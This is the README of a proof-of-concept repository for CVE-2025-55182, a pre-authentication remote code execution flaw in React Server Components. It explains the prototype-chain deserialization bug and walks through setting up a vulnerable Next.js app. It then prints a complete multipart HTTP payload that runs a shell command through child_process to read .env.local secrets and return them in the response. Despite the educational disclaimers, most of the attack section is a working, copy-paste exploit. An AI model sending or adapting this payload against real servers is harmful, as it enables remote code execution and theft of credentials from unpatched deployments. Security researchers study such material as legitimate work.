⚠️ WARNING: This repository is for educational and security research purposes only. Do not use this exploit against systems you do not own or have explicit permission to test.
This repository contains a proof-of-concept demonstration of CVE-2025-55182, a critical pre-authentication remote code execution vulnerability affecting React Server Components.
CVSS Score: 10.0 (Critical)
Affected Versions:
- React Server Components 19.0.0, 19.1.0, 19.1.1, and 19.2.0
- Packages:
react-server-dom-parcel,react-server-dom-turbopack,react-server-dom-webpack
CVE-2025-55182 is an unsafe deserialization vulnerability in React Server Components' Flight protocol implementation. The vulnerability allows unauthenticated attackers to execute arbitrary JavaScript code on the server by crafting malicious payloads that exploit prototype chain traversal and unsafe property access patterns.
The vulnerability stems from how React Server Components deserialize Flight protocol payloads. When processing module references, the code uses bracket notation to access properties (moduleExports[metadata[2]]), which traverses the entire JavaScript prototype chain. This allows attackers to reference properties that weren't explicitly exported, including the constructor property, which provides access to the global Function constructor.
By chaining prototype pollution techniques with React's internal chunk processing mechanisms, an attacker can construct a payload that ultimately executes arbitrary code through the Function constructor.
- Burp Suite Community or Professional (or any HTTP proxy/client)
- A vulnerable version of React.js or Next.js
Create a new project using a version that includes the vulnerable React Server Components:
npx create-next-app@16.0.6 poc-react2shell
cd poc-react2shellOr use that repository.
Create a .env.local file in the project root to demonstrate the impact of the vulnerability:
SECRET_API_KEY=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXLaunch the Next.js development server:
npm run devThe server should start on http://localhost:3000.
- In Burp Suite, go to the Repeater tab
- Set the target URL to
http://localhost:3000/ - Copy and paste the entire payload into the request window
- Send
Click to expand
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 752
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('cat .env.local',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
The response should contain the contents of your .env.local file in the response body:
The payload consists of three multipart form fields:
Field 0: A fake chunk object containing:
- Prototype pollution references (
$1:__proto__:then) - A Blob reference (
$B1337) that triggers the exploit - A polluted
_responseobject with malicious_prefixand_formData.get
Field 1: A reference to field 0 ($@0)
Field 2: An empty array ([])
The malicious code in _prefix reads .env.local using Node.js's child_process.execSync and embeds the result in an error digest.
This vulnerability allows attackers to:
- Execute arbitrary code on the server
- Read sensitive files (environment variables, configuration files, etc.)
- Establish reverse shells
- Exfiltrate data
- Perform any operation the Node.js process has permissions to execute
- CVE-2025-55182 Details
- Next.js-RSC-RCE-Scanner-CVE-2025-66478
- React Security Advisory
- Facebook Security Advisory
- CISA Known Exploited Vulnerabilities Catalog
- react2shellcve202555182
Want to exploit CVE-2025-55182 in a hands-on CTF environment? Check out OSS OopsSec Store, a deliberately vulnerable lab designed for offensive security training. This CVE is implemented as one of the flags!
This proof of concept is provided for educational purposes and security research only. Always ensure you have explicit written permission before testing security vulnerabilities on any system.
